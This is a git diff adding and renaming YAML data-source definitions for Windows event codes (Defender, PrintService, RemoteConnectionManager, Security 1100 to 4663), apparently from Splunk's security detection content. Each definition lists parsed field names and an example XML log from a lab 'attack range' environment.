+  Name='RuleType'>ENT\ConsR</Data><Data Name='Target Commandline'></Data><Data Name='Parent
+  Commandline'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data
+  Name='Involved File'></Data><Data Name='Inhertiance Flags'>0x00000000</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml b/data_sources/windows_event_log_defender_1129.yml
similarity index 56%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
rename to data_sources/windows_event_log_defender_1129.yml
index a78ba9b106..cf2d254758 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
+++ b/data_sources/windows_event_log_defender_1129.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Defender 1129
+name: Windows Event Log Defender 1129
+id: 0572e119-a48a-4c70-bc58-90e453edacd2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1129
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - ComputerName
diff --git a/data_sources/windows_event_log_defender_5007.yml b/data_sources/windows_event_log_defender_5007.yml
new file mode 100644
index 0000000000..a2cd143893
--- /dev/null
+++ b/data_sources/windows_event_log_defender_5007.yml
@@ -0,0 +1,64 @@
+name: Windows Event Log Defender 5007
+id: 27f18792-8d95-4871-8853-874b7faf023f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 5007
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- New_Value
+- Old_Value
+- Opcode
+- ProcessID
+- Product_Name
+- Product_Version
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>5007</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-11-27T10:39:16.1740105Z'/><EventRecordID>3726</EventRecordID><Correlation/><Execution
+  ProcessID='3512' ThreadID='5936'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender
+  Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Old
+  Value'>HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1</Data><Data
+  Name='New Value'></Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml b/data_sources/windows_event_log_printservice_316.yml
similarity index 55%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
rename to data_sources/windows_event_log_printservice_316.yml
index 5adb1ed150..ff94ae97f1 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
+++ b/data_sources/windows_event_log_printservice_316.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Printservice 316
+name: Windows Event Log Printservice 316
+id: 12f0be8b-22c0-4fdf-9468-b7ccca824d1d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Printservice 316
+source: WinEventLog:Microsoft-Windows-PrintService/Admin
+sourcetype: WinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - ComputerName
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml b/data_sources/windows_event_log_printservice_808.yml
similarity index 56%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
rename to data_sources/windows_event_log_printservice_808.yml
index 6cd8242d61..2ecb0dbc9b 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
+++ b/data_sources/windows_event_log_printservice_808.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Printservice 808
+name: Windows Event Log Printservice 808
+id: e3a26785-4389-4830-8d7b-3dad4252719e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Printservice 808
+source: WinEventLog:Microsoft-Windows-PrintService/Admin
+sourcetype: WinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - ComputerName
diff --git a/data_sources/windows_event_log_remoteconnectionmanager_1149.yml b/data_sources/windows_event_log_remoteconnectionmanager_1149.yml
new file mode 100644
index 0000000000..8fada924c2
--- /dev/null
+++ b/data_sources/windows_event_log_remoteconnectionmanager_1149.yml
@@ -0,0 +1,59 @@
+name: Windows Event Log RemoteConnectionManager 1149
+id: 08f9edb4-f95f-40be-b1dd-bc3a1cd95aaf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log RemoteConnectionManager 1149
+source: WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
+sourcetype: wineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-TerminalServices-RemoteConnectionManager' Guid='{c76baa63-ae81-421c-b425-340b4b24157f}'/><EventID>1149</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x1000000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-11T00:54:59.678287300Z'/><EventRecordID>2064</EventRecordID><Correlation
+  ActivityID='{f42005b9-c322-4bd9-962e-c985c22d0000}'/><Execution ProcessID='468'
+  ThreadID='968'/><Channel>Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational</Channel><Computer>ar-win-1.attackrange.local</Computer><Security
+  UserID='S-1-5-20'/></System><UserData><EventXML xmlns='Event_NS'><Param1>Administrator</Param1><Param2>ATTACKRANGE</Param2><Param3>10.0.1.14</Param3></EventXML></UserData></Event>
diff --git a/data_sources/windows_event_log_security_1100.yml b/data_sources/windows_event_log_security_1100.yml
new file mode 100644
index 0000000000..16052bd22c
--- /dev/null
+++ b/data_sources/windows_event_log_security_1100.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log Security 1100
+id: 2a25dafa-691e-4cb2-ae59-07a48867ed9a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 1100
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- service
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Eventlog' Guid='{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}'/><EventID>1100</EventID><Version>0</Version><Level>4</Level><Task>103</Task><Opcode>0</Opcode><Keywords>0x4020000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-08T18:48:10.378485000Z'/><EventRecordID>140874</EventRecordID><Correlation/><Execution
+  ProcessID='1108' ThreadID='4884'/><Channel>Security</Channel><Computer>ar-win-2</Computer><Security/></System><UserData><ServiceShutdown
+  xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'></ServiceShutdown></UserData></Event>
diff --git a/data_sources/windows_event_log_security_1102.yml b/data_sources/windows_event_log_security_1102.yml
new file mode 100644
index 0000000000..c2164817b4
--- /dev/null
+++ b/data_sources/windows_event_log_security_1102.yml
@@ -0,0 +1,85 @@
+name: Windows Event Log Security 1102
+id: 8db7b91a-6d7a-40e7-bfac-06f8e901a9cb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 1102
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- LogFileCleared_Xml
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Eventlog' Guid='{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}'/><EventID>1102</EventID><Version>0</Version><Level>4</Level><Task>104</Task><Opcode>0</Opcode><Keywords>0x4020000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-05T09:18:29.313328400Z'/><EventRecordID>1826166</EventRecordID><Correlation/><Execution
+  ProcessID='412' ThreadID='1072'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><UserData><LogFileCleared
+  xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'><SubjectUserSid>ATTACKRANGE\Administrator</SubjectUserSid><SubjectUserName>Administrator</SubjectUserName><SubjectDomainName>ATTACKRANGE</SubjectDomainName><SubjectLogonId>0x34a3a27</SubjectLogonId></LogFileCleared></UserData></Event>
diff --git a/data_sources/windows_event_log_security_4624.yml b/data_sources/windows_event_log_security_4624.yml
new file mode 100644
index 0000000000..0864fb4d62
--- /dev/null
+++ b/data_sources/windows_event_log_security_4624.yml
@@ -0,0 +1,135 @@
+name: Windows Event Log Security 4624
+id: 08682968-0366-4882-9559-fe4fe018a846
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4624
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuthenticationPackageName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- ElevatedToken
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ImpersonationLevel
+- IpAddress
+- IpPort
+- KeyLength
+- Keywords
+- Level
+- LmPackageName
+- LogonGuid
+- LogonProcessName
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- RestrictedAdminMode
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLinkedLogonId
+- TargetLogonId
+- TargetOutboundDomainName
+- TargetOutboundUserName
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TransmittedServices
+- Version
+- VirtualAccount
+- WorkstationName
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_ip
+- src_port
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4624</EventID><Version>2</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-03-23T19:15:28.337312500Z'/><EventRecordID>371886</EventRecordID><Correlation
+  ActivityID='{64015806-5D92-0000-1258-0164925DD901}'/><Execution ProcessID='596'
+  ThreadID='2428'/><Channel>Security</Channel><Computer>ar-win-7.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>NULL SID</Data><Data Name='SubjectUserName'>-</Data><Data
+  Name='SubjectDomainName'>-</Data><Data Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>ATTACKRANGE\ELMER_SALAS</Data><Data
+  Name='TargetUserName'>ELMER_SALAS</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data
+  Name='TargetLogonId'>0x693ef4</Data><Data Name='LogonType'>3</Data><Data Name='LogonProcessName'>Kerberos</Data><Data
+  Name='AuthenticationPackageName'>Kerberos</Data><Data Name='WorkstationName'>-</Data><Data
+  Name='LogonGuid'>{139F7D70-0163-38CC-676D-00AE04A0F19C}</Data><Data Name='TransmittedServices'>-</Data><Data
+  Name='LmPackageName'>-</Data><Data Name='KeyLength'>0</Data><Data Name='ProcessId'>0x0</Data><Data
+  Name='ProcessName'>-</Data><Data Name='IpAddress'>10.0.1.16</Data><Data Name='IpPort'>49980</Data><Data
+  Name='ImpersonationLevel'>%%1833</Data><Data Name='RestrictedAdminMode'>-</Data><Data
+  Name='TargetOutboundUserName'>-</Data><Data Name='TargetOutboundDomainName'>-</Data><Data
+  Name='VirtualAccount'>%%1843</Data><Data Name='TargetLinkedLogonId'>0x0</Data><Data
+  Name='ElevatedToken'>%%1843</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4625.yml b/data_sources/windows_event_log_security_4625.yml
new file mode 100644
index 0000000000..7824f0dfee
--- /dev/null
+++ b/data_sources/windows_event_log_security_4625.yml
@@ -0,0 +1,127 @@
+name: Windows Event Log Security 4625
+id: 365a02c2-7d18-4baf-b76e-d90c20bbe6ed
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4625
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuthenticationPackageName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- FailureReason
+- Guid
+- IpAddress
+- IpPort
+- KeyLength
+- Keywords
+- Level
+- LmPackageName
+- LogonProcessName
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- Source_Port
+- Source_Workstation
+- Status
+- SubStatus
+- Sub_Status
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TransmittedServices
+- Version
+- WorkstationName
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_ip
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4625</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated
+  SystemTime='2023-03-22T20:25:15.594676400Z'/><EventRecordID>367348</EventRecordID><Correlation
+  ActivityID='{6C54D781-5C05-0000-8CD7-546C055CD901}'/><Execution ProcessID='588'
+  ThreadID='3564'/><Channel>Security</Channel><Computer>ar-win-8.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>NULL SID</Data><Data Name='SubjectUserName'>-</Data><Data
+  Name='SubjectDomainName'>-</Data><Data Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>NULL
+  SID</Data><Data Name='TargetUserName'>Administrator</Data><Data Name='TargetDomainName'>builtin</Data><Data
+  Name='Status'>0xc000006d</Data><Data Name='FailureReason'>%%2313</Data><Data Name='SubStatus'>0xc000006a</Data><Data
+  Name='LogonType'>3</Data><Data Name='LogonProcessName'>NtLmSsp </Data><Data Name='AuthenticationPackageName'>NTLM</Data><Data
+  Name='WorkstationName'>-</Data><Data Name='TransmittedServices'>-</Data><Data Name='LmPackageName'>-</Data><Data
+  Name='KeyLength'>0</Data><Data Name='ProcessId'>0x0</Data><Data Name='ProcessName'>-</Data><Data
+  Name='IpAddress'>10.0.1.30</Data><Data Name='IpPort'>59450</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4627.yml b/data_sources/windows_event_log_security_4627.yml
new file mode 100644
index 0000000000..0682bbbc29
--- /dev/null
+++ b/data_sources/windows_event_log_security_4627.yml
@@ -0,0 +1,102 @@
+name: Windows Event Log Security 4627
+id: e35c7b9a-b451-4084-95a5-43b7f8965cac
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4627
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventCountTotal
+- EventData_Xml
+- EventID
+- EventIdx
+- EventRecordID
+- GroupMembership
+- Guid
+- Keywords
+- Level
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4627</EventID><Version>0</Version><Level>0</Level><Task>12554</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-10-05T20:02:43.026235200Z'/><EventRecordID>186260</EventRecordID><Correlation
+  ActivityID='{58660170-f720-0003-8b01-665820f7d901}'/><Execution ProcessID='620'
+  ThreadID='4580'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>S-1-0-0</Data><Data Name='SubjectUserName'>-</Data><Data Name='SubjectDomainName'>-</Data><Data
+  Name='SubjectLogonId'>0x0</Data><Data Name='TargetUserSid'>S-1-5-21-2442966654-584408786-1775486684-1115</Data><Data
+  Name='TargetUserName'>lowpriv</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data
+  Name='TargetLogonId'>0x1094dbc</Data><Data Name='LogonType'>3</Data><Data Name='EventIdx'>1</Data><Data
+  Name='EventCountTotal'>1</Data><Data Name='GroupMembership'>
diff --git a/data_sources/windows_event_log_security_4648.yml b/data_sources/windows_event_log_security_4648.yml
new file mode 100644
index 0000000000..a5840b93d3
--- /dev/null
+++ b/data_sources/windows_event_log_security_4648.yml
@@ -0,0 +1,118 @@
+name: Windows Event Log Security 4648
+id: 6a367f8b-1ee0-463d-94a7-029757c6cd02
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4648
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- LogonGuid
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- RecordNumber
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetInfo
+- TargetLogonGuid
+- TargetServerName
+- TargetUserName
+- Target_Domain
+- Target_Server_Name
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dest_nt_host
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process_id
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_domain
+- src_nt_host
+- src_port
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4648</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-08T21:33:47.813673700Z'/><EventRecordID>336567</EventRecordID><Correlation
+  ActivityID='{61CE8B0D-C305-0002-148B-CE6105C3D801}'/><Execution ProcessID='644'
+  ThreadID='4476'/><Channel>Security</Channel><Computer>win-host-mvelazco-02713-447.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>ATTACKRANGE\REED_LARSEN</Data><Data Name='SubjectUserName'>reed_larsen</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x1360f2</Data><Data
+  Name='LogonGuid'>{00000000-0000-0000-0000-000000000000}</Data><Data Name='TargetUserName'>STEVE_BRADFORD</Data><Data
+  Name='TargetDomainName'>attackrange.local</Data><Data Name='TargetLogonGuid'>{00000000-0000-0000-0000-000000000000}</Data><Data
+  Name='TargetServerName'>win-dc-mvelazco-02713-392.attackrange.local</Data><Data
+  Name='TargetInfo'>win-dc-mvelazco-02713-392.attackrange.local</Data><Data Name='ProcessId'>0x4</Data><Data
+  Name='ProcessName'></Data><Data Name='IpAddress'>10.0.1.14</Data><Data Name='IpPort'>445</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4662.yml b/data_sources/windows_event_log_security_4662.yml
new file mode 100644
index 0000000000..004e36888c
--- /dev/null
+++ b/data_sources/windows_event_log_security_4662.yml
@@ -0,0 +1,103 @@
+name: Windows Event Log Security 4662
+id: f3c2cd64-0b5f-4013-8201-35dc03828ec6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4662
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- ActivityID
+- AdditionalInfo
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HandleId
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectName
+- ObjectServer
+- ObjectType
+- Opcode
+- OperationType
+- ProcessID
+- Properties
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_file_name
+- object_file_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4662</EventID><Version>0</Version><Level>0</Level><Task>14080</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-02T22:41:45.751175400Z'/><EventRecordID>21623198276</EventRecordID><Correlation
+  ActivityID='{7BAD94BA-268A-0000-BB94-AD7B8A26D901}'/><Execution ProcessID='848'
+  ThreadID='7136'/><Channel>Security</Channel><Computer>attack_range_dc</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>attack_range\attacker</Data><Data Name='SubjectUserName'>attacker</Data><Data
+  Name='SubjectDomainName'>attack_range</Data><Data Name='SubjectLogonId'>0x632426dc0</Data><Data
+  Name='ObjectServer'>DS</Data><Data Name='ObjectType'>group</Data><Data Name='ObjectName'>CN=Incoming
+  Forest Trust Builders,CN=Users,DC=Attack_Range</Data><Data Name='OperationType'>Object
+  Access</Data><Data Name='HandleId'>0x0</Data><Data Name='AccessList'>%%7688
diff --git a/data_sources/windows_event_log_security_4663.yml b/data_sources/windows_event_log_security_4663.yml
new file mode 100644
index 0000000000..44fa5cf912
--- /dev/null
